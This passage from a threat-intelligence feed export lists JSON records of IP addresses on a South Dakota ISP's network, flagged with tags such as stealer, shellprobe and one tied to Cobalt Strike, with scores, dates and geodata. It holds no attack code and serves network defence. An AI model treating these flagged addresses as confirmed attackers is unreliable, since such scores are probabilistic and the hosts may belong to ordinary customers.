763, "firstip": {"netv4": "209.159.192.0", "num": "3516907520"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "209.159.215.255", "num": "3516913663"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:653E3797-DB53-3031-9B84-8B128C4EA9DD", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 209.159.217.128", "description": "Found **209[.]159.217.128** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **28**.\n First seen: 2021-09-05T03:00:00, Last seen: 2021-10-07T03:00:00.\n IOC tags: **stealer**.\nASN 20412: (First IP 209.159.216.0, Last IP 209.159.237.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 763 domains.\nGEO IP information: City \"Rapid City\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-08T00:00:00", "modified": "2021-09-05T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-07T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "b4d026fd7b144591c2d90e845b446c15"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "76b133d9d6179bda7134a5b6d780d668"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "b24a857a501cad12c13fdcf3ab38c98e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "ef39234fac3edf6f7e7d54c09030dc5f"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "9143c59605b528aa3359993f0d08faf5"}, {"key": "modified", "hash": "b71f26021aebc9cf104389ae17151803"}, {"key": "published", "hash": "b7a3dc8d61f8415dec7fce4b44754fee"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "4eafbbb4b0f60ef08e937e4d265e586e"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "b475b3a415017da9cd25836bc1788245"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "40e8f0fe8fb0b273c743d2dbc27a42663c4ce3e45cc6b7fe83a93d128cedf413", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["209.159.217.128"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.6, "ioc_src": 54.78, "ioc_tags": 0.88, "ioc_total": 28.0}, "tags": ["stealer"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Rapid City", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 763, "firstip": {"netv4": "209.159.216.0", "num": "3516913664"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "209.159.237.255", "num": "3516919295"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:420A4A78-3DDE-3652-BFF6-C0068D6C95B6", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 209.159.254.102", "description": "Found **209[.]159.254.102** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-09-16T03:00:00, Last seen: 2021-09-22T03:00:00.\n IOC tags: **shellprobe**.\nASN 20412: (First IP 209.159.238.0, Last IP 209.159.255.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 728 domains.\nGEO IP information: City \"Rapid City\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-09-23T00:00:00", "modified": "2021-09-16T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-09-22T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "92108f6a1d84d37a09e3282e169bf947"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "d8d901ace3ad636f10e3ba6469f52fe3"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "b24a857a501cad12c13fdcf3ab38c98e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "6cc0ba90799b310993b728d72959caec"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "fdf67ee285dd43d7db7c6feaf4c796be"}, {"key": "modified", "hash": "77d1f7016ffde7573bf85bf651b92bce"}, {"key": "published", "hash": "a19f139b5e34a7ef5af8846d40f49f16"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "491bc2b807c75b65b61a708198a94d91"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "4e32f5916ca5c6cee9c4dd3ed0c36a40d9e104bc6b88c588d5fa73a070d25925", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["209.159.254.102"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.9, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 42.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Rapid City", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 728, "firstip": {"netv4": "209.159.238.0", "num": "3516919296"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "209.159.255.255", "num": "3516923903"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:87089FBD-E960-37BB-A3D4-D5EDCC449197", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 24.214.182.65", "description": "Found **24[.]214.182.65** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **27**.\n First seen: 2021-08-19T03:00:00, Last seen: 2021-09-18T03:00:00.\n IOC tags: ****.\nASN 20412: (First IP 24.214.182.0, Last IP 24.214.183.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 728 domains.\nGEO IP information: City \"Rapid City\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-09-19T00:00:00", "modified": "2021-08-19T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-09-18T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "9b9e767e8f0f45c5dc69f989962175bf"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "cde4aea5438d8ed841afdf9125081212"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "b24a857a501cad12c13fdcf3ab38c98e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "0cbf20cc66f2efe010beb4a71b3ff8d6"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "2b02c749d980d2c918454c0221dcef14"}, {"key": "modified", "hash": "83a0fa028948f803012053521eb488d2"}, {"key": "published", "hash": "74f6c61c180ab510a9b8c901746cc844"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "fd84215d9868a61176c07c5ac7e251d8"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "4bd779a1e0b27be24f232d4b61decb030b406f8b81e0e5dbdf20ddd142035741", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["24.214.182.65"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.62, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 27.0}, "tags": [], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Rapid City", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 728, "firstip": {"netv4": "24.214.182.0", "num": "416724480"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "24.214.183.255", "num": "416724991"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:98386E90-F685-3214-BFE7-F240BA1A9541", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 216.16.93.54", "description": "Found **216[.]16.93.54** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **43**.\n First seen: 2021-08-13T03:00:00, Last seen: 2021-08-13T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 216.16.70.0, Last IP 216.16.101.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 776 domains.\nGEO IP information: City \"Beresford\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-14T00:00:00", "modified": "2021-08-13T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-13T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "1e95f8f68e0d69caec8e6db13d07bb8c"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "a20dac123f285074c8d45e9f119e12c8"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "db81f6ca871a1327b839e8e932207e15"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "239ebb425128eb034e99da9b7615f78c"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "4131b42a3d5562450ddbd933140b4364"}, {"key": "modified", "hash": "eb45ee330ece1d998183fb154d423653"}, {"key": "published", "hash": "50b212d2a9bf211feaa5a6d37140c229"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "2a9a6085c033054a7c8ce9882a38e4df"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "5b82091fea583bf7403f6034a48ae66293ef86e63d7cb73d2d2765fd433b731d", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["216.16.93.54"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 43.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Beresford", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 776, "firstip": {"netv4": "216.16.70.0", "num": "3624945152"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "216.16.101.255", "num": "3624953343"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:FFB3BAAA-FBE7-3154-95E9-B1AF1B9C351C", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 216.16.10.86", "description": "Found **216[.]16.10.86** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **4**.\n First seen: 2021-05-13T03:00:00, Last seen: 2021-08-09T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 216.16.8.0, Last IP 216.16.16.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 776 domains.\nGEO IP information: City \"Madison\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-10T00:00:00", "modified": "2021-05-13T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-08-09T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "cdeb1cb3b9a1b09b5946d585b61c1ade"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "5afb5c68e23e71a47923ccbda7cfe9e4"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e9bef11a8eccc1c8865bc7b550b05147"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "6213b22474e84f77e90389ac91feb913"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "bc6e14bde71870d06a6f3a4174ccdb52"}, {"key": "modified", "hash": "78de587b48b9535bd1019a8c530fc1a5"}, {"key": "published", "hash": "beec300de6ded4394fd72f693886408c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "77776258d631bea624a4de68673c1448"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "70891d23d24bde45f5af5ddc7033787a527ec63eeb87e4951e38fe5e8ab7f753", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["216.16.10.86"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.32, "ioc_src": 16.44, "ioc_tags": 0.8, "ioc_total": 4.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Madison", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 776, "firstip": {"netv4": "216.16.8.0", "num": "3624929280"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "216.16.16.255", "num": "3624931583"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:306D8017-EFB8-35A2-9EDC-E2C1744D0C5E", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 64.179.171.3", "description": "Found **64[.]179.171.3** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **6**.\n First seen: 2021-01-13T03:00:00, Last seen: 2021-07-26T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 64.179.152.0, Last IP 64.179.191.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 822 domains.\nGEO IP information: City \"Luverne\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-27T00:00:00", "modified": "2021-01-13T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-07-26T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "8969b7ad88aeb166afbeb1776b23469e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "2de9e183c70a54bb3b7e73a512f0a6c0"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "8c2570a733aa43c224e71bd1aa54bbbb"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "ea6f50faccbea513572635ba1264e801"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "401026aeb918617cb140254b553970f0"}, {"key": "modified", "hash": "a938439ebba4442865c9fe4b040fd205"}, {"key": "published", "hash": "b2a952d51e66ce457afaac08fe3cd0ba"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "1d647629fdb12cb8179a269832a5bc08"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "9aba643ead2ea75e9f7d27198bc57c1a24e29d37d64404b15381a7e0dce663e7", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["64.179.171.3"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.15, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 6.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Luverne", "country": "United States", "region": "Minnesota"}, "asn": {"cloud": "", "domains": 822, "firstip": {"netv4": "64.179.152.0", "num": "1085511680"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "64.179.191.255", "num": "1085521919"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:B874DEE5-FD2C-3F8F-AEA1-AE657FA32324", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 209.159.195.3", "description": "Found **209[.]159.195.3** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **26**.\n First seen: 2021-06-20T03:00:00, Last seen: 2021-07-22T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 209.159.192.0, Last IP 209.159.215.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 822 domains.\nGEO IP information: City \"Lead\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-23T00:00:00", "modified": "2021-06-20T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-07-22T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "62ac2b8c252deef36660e4bdc745bc38"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "0ae7a9e3ef0b1da78977e6f27d82d494"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "dc171ae63b62ba49107edb8c848f508b"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "364110189aa996b083cc006297ea1717"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "4b6f2490e197c021ae5d12ee3360562c"}, {"key": "modified", "hash": "7b642fd6b4bdcfbd4ba2867979916a24"}, {"key": "published", "hash": "57e572597f7d216280bd696c2484c0c9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "672c78dc5407240e62099f06a07ce22d"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "6e296cab4c1519c977b72d3f0c3601a1652831a8fb2f879976e146705cae3c61", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["209.159.195.3"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.6, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 26.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Lead", "country": "United States", "region": "South Dakota"}, "asn": {"cloud": "", "domains": 822, "firstip": {"netv4": "209.159.192.0", "num": "3516907520"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "209.159.215.255", "num": "3516913663"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": []}, {"id": "RST:5CE3E590-D19E-32BB-A617-02F87F42A5C2", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 216.16.22.149", "description": "Found **216[.]16.22.149** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **3**.\n First seen: 2020-09-01T03:00:00, Last seen: 2021-06-14T03:00:00.\n IOC tags: **generic**.\nASN 20412: (First IP 216.16.17.0, Last IP 216.16.30.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 806 domains.\nGEO IP information: City \"Marshall\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-06-21T00:00:00", "modified": "2020-09-01T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-06-14T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "1a366abf923f26ead0fae43112bb728e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "fdaa53941da4a942f0d778500bccab6b"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "a1d581d9ab40f552453249210a0e06b8"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "a61153014c00d61cf2fea80a2b1754d6"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "68e376261243681c3270221a3bffe9d2"}, {"key": "modified", "hash": "4e391e9492fcc435c8ec035f22720888"}, {"key": "published", "hash": "779937c5193e71ff5f7d5c7ab1992307"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "b2a6b4bdd70f8a1d607c6206c5af0d62"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "53f6acaf8c14b2a53a2a523bb4e8b719f4c2a5839ce2d4ac61d358891c3f997b", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["216.16.22.149"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.09, "ioc_src": 55.03, "ioc_tags": 0.8, "ioc_total": 3.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Marshall", "country": "United States", "region": "Minnesota"}, "asn": {"cloud": "", "domains": 806, "firstip": {"netv4": "216.16.17.0", "num": "3624931584"}, "isp": "CLARITYTELECOM", "lastip": {"netv4": "216.16.30.255", "num": "3624935167"}, "num": 20412, "org": "Clarity Telecom LLC"}, "threat": [], "immutableFields": []}, {"id": "RST:058C9925-40F5-3756-A9F7-A35482433805", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 209.159.207.46", "description": "Found **209[.]159.207.46** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **60**.\n First seen: 2021-04-25T03:00:00, Last seen: 2021-04-25T03:00:00.\n IOC tags: **malware**.\nWe found that the IOC is used by: **cobalt_strike**.\nASN 20412: (First IP 209.159.192.0, Last IP 209.159.215.255).\nASN Name \"CLARITYTELECOM\" and Organisation \"Clarity Telecom LLC\".\nASN hosts 829 domains.\nGEO IP information: City \"Rapid City\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-04-27T00:00:00", "modified": "2021-04-25T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-04-25T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "db63bd1feb04309aa357c5e8b95534df"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "624b9fcbead1cbd788730719d48466a6"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "b24a857a501cad12c13fdcf3ab38c98e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "ee1fa7f21385c93f8e72550dc50b748d"}, {"key": 